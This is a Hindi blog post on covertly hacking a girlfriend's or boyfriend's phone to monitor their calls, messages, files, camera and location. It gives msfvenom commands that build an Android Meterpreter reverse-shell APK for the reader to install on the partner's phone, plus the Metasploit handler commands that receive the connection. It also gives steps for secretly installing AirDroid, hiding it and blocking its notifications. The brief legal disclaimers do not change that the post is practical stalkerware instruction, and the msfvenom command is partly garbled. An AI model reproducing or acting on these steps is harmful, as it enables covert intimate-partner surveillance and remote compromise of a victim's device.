बिना फोन टच किये अपने गर्लफ्रेंड/बॉयफ्रेंड का मोबाइल हैक कैसे करे | 2 तरीके

0

क्या आपको भी बिना फोन टच किये अपने गर्लफ्रेंड/बॉयफ्रेंड का मोबाइल हैक कैसे करे? की जानकारी चाहिए, तो आज की पोस्ट में मै आपको बताऊंगा की बिना छुए मोबाइल हैक कैसे किया जाता है. यदि आप भी अपने किस के मोबाइल पर 24 घंटे नजर रखना चाहते हैं तो ये पोस्ट आपके बहुत काम की है. इस पोस्ट में आप 5 मिनिट के अंदर किस के भी मोबाइल को हैक कर सकते हैं. बढ़ी बात तो ये है की इसके लिए आपको किसी हैकिंग कोर्स की भी जरूरत नहीं है. इस पोस्ट में आपको कुछ तरीके बताने वाला हूँ जिसे किसी के भी मोबाइल को हैक किया जा सकता है. तो चलिये जानते हैं की किसी दूसरे का मोबाइल हैक कैसे करें ?

वैसे तो किसी के भी मोबाइल को हैक करना काफी मुश्किल काम है पर इस पोस्ट से आपको काफी आसान लगने लगेगा. यदि आप किसी से प्यार करते हैं और आपको लगता है की वो आपको धोखा दे रहा है तब हमें मोबाइल हैक करने की जरूरत पड़ती है, ताकि हम उस पर किसी न किसी तरह से नजर रख सकें.

kisi ke bhi mobile ko kaise hack kare

बिना फोन टच किये अपने गर्लफ्रेंड/बॉयफ्रेंड का मोबाइल हैक कैसे करे?

एंड्राइड एक ऐसी किताब है जिसको कोई कितना भी चाहे तो पूरा नहीं पढ़ सकता है. अब आप समझ जाएँ कि किस का मोबाइल हैक करना कितना कठिन है. किसी के मोबाइल को हैक करना बच्चों का खेल नहीं है. वो भी बिना फोन टच किये. यदि आपको किस के मोबाइल को हैक करना है तो कम से कम 5 मिनिट के लिए उसका मोबाइल आपके हाथ में होना चाहिए.

अब आप बोलेंगे की आपने टाइटल में तो बिना फोन टच किये अपने गर्लफ्रेंड/बॉयफ्रेंड का मोबाइल हैक कैसे करे?दिया है की तो इसके लिए भी एक तरकीब है लेकिन इसके लिए आपको हैकिंग की पूरी जानकारी होना चाहिए.

यदि आप सामने वाले का मोबाइल हैक कर लेते हैं तो आपको उसके मोबाइल में होने वाली सभी जानकारी मिलती रहती है जैसे वाह्ट्सएप, वीडियो कॉल, कॉल लोग, मेसेज आदि. यदि आपको हैकिंग की बिलकुल भी नॉलेज नहीं तो इस पोस्ट में आपको इतने इजी तरीके से बताया जाएगा की आपको कोई दिक्कत नहीं होगी.

ये भी जरूर पढ़ें - Whatsapp Hack Hai Kaise Pata Kare | तीन सॉलिड तरीके

नोट - "सबसे पहले ये जान लें की ये पोस्ट गैर कानूनी कामों को बढ़ावा देने के लिए नहीं लिखी जा रही है. ये पोस्ट केवल नॉलेज के लिए है की ऐसा भी हो सकता है और न हीं इस पोस्ट का मकसद किसी को नुक्सान पहुँचाना है. पाठकों से भी निवेदन है इसका यूज किसी को नुक्सान पहुंचाने में न करें"

मोबाइल हैक करके क्या क्या किया जा सकता है ?

हम मोबाइल हैक तो कर रहे हैं पर ऐसा करने पर हम उस मोबाइल का क्या क्या एक्सेस कर सकते हैं या देख सकते हैं पहले ये जान लेना चाहिए. नहीं तो पता चले सारी प्रोसेस कर ली और कोई फायदा नहीं हुआ.

कॉल रिकॉर्ड कर सकते हैं - जी हाँ किसी के मोबाइल को हैक करके आप उसकी कॉल को रिकॉर्ड करके सुन सकते हैं. वो किस किस से बात करता है या किसका कॉल आता है सभी जानकारी आपके पास आ जाएगी

मेसेज पढ़ सकते हैं - किसी के मोबाइल को हैक करने पर आप उसके मोबाइल में सेव या आये हुए सभी मेसेज को अपने मोबाइल में पढ़ सकते हैं.

फ़ाइल मेनेजर एक्सेस कर सकते हैं - उसके मोबाइल में फाइल मैनेजर में जो भी डेटा रखा है फोटोज, वीडियो, डॉक्यूमेंट आदि उसे आप अपने मोबाइल पर देख सकते हैं.

केमरा एक्सेस कर सकते हैं - उसके मोबाइल के कैमरे की हर हरकत को आप कैप्चर कर सकते हैं यदि आप किसी का मोबाइल हैक कर लेते हैं तो

इन्सटाल्ड ऐप को एक्सेस कर सकते हैं - जितने भी ऐप उसने अपने मोबाइल में इनस्टॉल किये हैं सभी पर आप निगरानी रख सकते हैं. जैसे व्हाट्सएप, फेसबुक पर किस्से चेटिंग हो रही है सभी जान सकते हैं.

अभी वो कहाँ है लाइव लोकेशन जान सकते हैं - आपका पार्टनर कहाँ कहाँ जाता है, कितनी देर रुकता है उसकी लाइव लोकेशन का पता आसानी से लगाया जा सकता है.

इसे भी पढ़ा जाता है - किसी भी मोबाइल नंबर की सही लोकेशन Online कैसे पता करें

Kali Linux के द्वारा किसी दूसरे का मोबाइल हैक कैसे करे?

यदि आपके पास लैपटॉप या कंप्यूटर उपलब्ध है तो आप काली लिनक्स से किसी भी मोबाइल पर निगरानी रख सकते हैं. किसी के भी मोबाइल को हैक करने के लिए सबसे शानदार तरीका है स्पाई एप, पर सभी पेड होते हैं फ्री नहीं होते हैं. 

पर ये एक ऐसी विधि है जिसमें आपको पैसा खर्च नहीं करना पढता है बिलकुल फ्री में किसी भी मोबाइल पर नजर रख सकते हैं. इसके लिए आप केवल कंप्यूटर लीजिए और खुद का Payload Creat कर Hacking का मजा लीजिये. कैसे करना है वो आगे पढ़ते रहिये.

Step 1. सबसे पहले काली लिनक्स में टर्मिनल को खोलें और नीचे दी हुई कमांड को लिखें.

MSFVENOM -P ANDROID/METERPRETER/REVERSE_TCP LHOST=170.14.22.211 R > LPORT=1234 /ROOT/Technology4every1.APK

MSFVENOM - यह इसी का एक टूल है जिसको रिवर्स इंजीनियरिंग में उपयोग किया जाता है.

P ANDROID/METERPRETER/REVERSE_TCP - यहाँ पर हम अपने मोबाइल के लिए Payload Creat कर रहे हैं हैं और P का मतलब Payload  होता है इसीलिए यहाँ पर एंड्राइड लिखेंगे.

LHOST - इस जगह आपको अपने मोबाइल का IP Adress भरना है.

जरूरी - काली लिनक्स में आप एक नया टर्मिनल ओपन करें और कमांड ifconfig देना है, जिससे आप अपना आईपी एड्रेस चेक कर सकते हैं.

LPORT - इसके जरिये आप लोकल पोर्ट सेट कर सकते हैं, 1234 की जगह आप कुछ भी नंबर सेट कर सकते हैं

/ROOT/Technology4every1.APK - यह आपके Payload का नाम और Path है. आप चाहें तो अपने हिसाब से नाम दे सकते हैं, जैसे /ROOT/apkaname.APK.

ऊपर जो आपको कमांड बतायी गयी है उसे टाइप करें और Enter प्रेस कर दें , तो आपके सामने एक काली विंडो ओपन होगी जो नीचे दी गयी है.

kali linux se doosare ka mobile kaise hack kare

Step 2. अब आपका Payload Create हो गया है जिसको आप अपने कंप्यूटर में रुट फोल्डर में देख सकते हैं.

kali linux se doosare ka mobile kaise hack kare (1)

Step 3. इसके बाद आपको इस Technology4every1.apk Payload को अपने गर्लफ्रेंड या बॉयफ्रैं के मोबाइल में सेंड कर देना है और किसी भी तरीके से इनस्टॉल कर देना है.

सामने वाले के मोबाइल में Payload इंस्टॉल होने के बाद ओपन करें और फिर अपने काली लिनक्स कंप्यूटर में नीचे कमांड दी गयी हैं जिनको बारी बारी से टाइप करना है.

Step 4. इसके बाद सबसे पहले अपने काली लिनक्स टर्मिनल में कमांड msfconsole टाइप करना है.

kali linux se doosare ka mobile kaise hack kare (1)

Step 5. ऐसा करते ही आपके कंप्यूटर में metasploit framework console स्टार्ट हो जाएगा जिसमे थोड़ा समय लग सकता है.

Step 6. अब metasploit framework console खुलने के बाद नीचे दी गयी कमाण्ड को बारी बारी से टाइप कर देना है.

use exploit multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.1.111 (यहां पर आपको अपना लोकल IP डालना है)

set lport 4444

exploit

यदि आपने सही तरीके से ऊपर दी हुई कमांड एक एक करके एंटर कर दिया तो आप अपने पार्टनर के मोबाइल से जुड़ जाएंगे.

kali linux se doosare ka mobile kaise hack kare (1)

Step 7. मुबारक हो आपने अपने गर्लफ्रेंड या बॉयफ्रेंड का मोबाइल हैक कर लिया है. अब वो जो भी अपने फोन में करेगा आपको जानकारी मिलती रहेगी जैसे कॉल लोग, Camera, ब्राउज़िंग हिस्ट्री, एस एम एस की जानकारी आदि.

आपको यदि ये जानना हो कि किस किस कमांड से क्या क्या होता है तो इसके लिए अपने टर्मिनल में लिख दें जानकारी मिल जायेगी.

AirDroid गर्लफ्रेंड/बॉयफ्रेंड का मोबाइल हैक कैसे करे?

यदि किसी कारण वस आपको ऊपर बताए गए तरीके से फायदा न मिले या सफल न हो पाएं तो आपको चिंता नहीं करना है क्योंकि इस तरीके से भी मोबाइल को सिर्फ एक ऐप से हैक किया जा सकता है. नीचे दिए गए सभी स्टेप्स को फोलो करें और अपने काम को सफल बनायें.

also read - 

1. AirDroid सबसे पहले आपको गूगल प्ले स्टोर में जाकर एप को डाउनलोड कर लेना है एवं इनस्टॉल कर लेना है.

2. इसके बाद इस ऐप को ओपन कर लेना है और पहले से अकाउंट बना हो तो लोगिन कर लें नहीं तो यहाँ पर अकाउंट बनाना होगा. अकाउंट बनाने के लिए Sign UP बटन पर क्लिक करें जो दायीं तरफ दिया है.

3. यहाँ आपको अपनी ईमेल आईडी डालनी है. इसके बाद में कम से कम 8 डिजिट का स्ट्रांग पासवर्ड डाल देना है और दोबारा पासवर्ड डालकर कन्फर्म कर देना है. ये सब डिटेल भरने के बाद साइन-अप पर क्लिक कर देना है आपका अकाउंट बन जायेगा

4. अब आपको जिसके मोबाइल हैक करना है उसका मोबाइल लेकर उसमे एयरड्रॉयड ऐप इनस्टॉल कर देना है और ओपन कर देना है.

5. इसके बाद में उसके मोबाइल में जो ऐप खोली है उसमे अपना ईमेल आईडी और पासवार्ड डालकर लॉगइन कर लेना है. (वही ईमेल और पॉसवर्ड डालें जो अभी अभी आपने बनाया था).

6. अब आपने फोन से एयरड्रॉयड ऐप को छिपा देना है एवं नोटिफिकेशन को ब्लॉक कर देना है. अब उसका फोन वापिस कर दें.

7. इसके बाद में मोबाइल या कंप्यूटर पर कोई भी ब्राउज़र ओपन करना है और उसमे एयरड्रॉयड की ऑफिशियल वेबसाइट को खोल देना है और लोगिन कर देना है.

मुबारक हो आपने अपने गिर्ल्फ्रेंड/बॉयफ्रेंड का मोबाइल हैक कर लिया है अब उसके सभी कॉल्स, मेसेज, गैलरी, फाइल मैनेजर और केमरा एक्सेस आपके पास होगा. अब वह अपने कैमरे से फोटो भी क्लिक करेंगे तो आपको पता चल जायेगा.

वार्निंग - इस पोस्ट का यूज केवल अपने ज्ञान को बढ़ाने के लिए ही करें न की किसी को कष्ट पहुंचाने के लिए. बिना किसी की इजाजत के उसका फोन न यूज करें. किसी का भी मोबाइल हैक करना कानून के खिलाफ है और एक अपराध है. हैकिंग से खुद दूर रहें एवं दूसरों को भी दूर रहने की सलाह दें.

मेने बिना फोन टच किये अपने गर्लफ्रेंड/बॉयफ्रेंड का मोबाइल हैक कैसे करे? की जानकारी देने की कोसिस करी है यदि कोई स्टेप में किसी भी प्रकार के प्रॉब्लम आये तो कमेंट करें. एक बात का जरूर ध्यान रखें की, किसी को कोई नुक्सान न हो मेरी इस पोस्ट से.

एक टिप्पणी भेजें

0टिप्पणियाँ

एक टिप्पणी भेजें (0)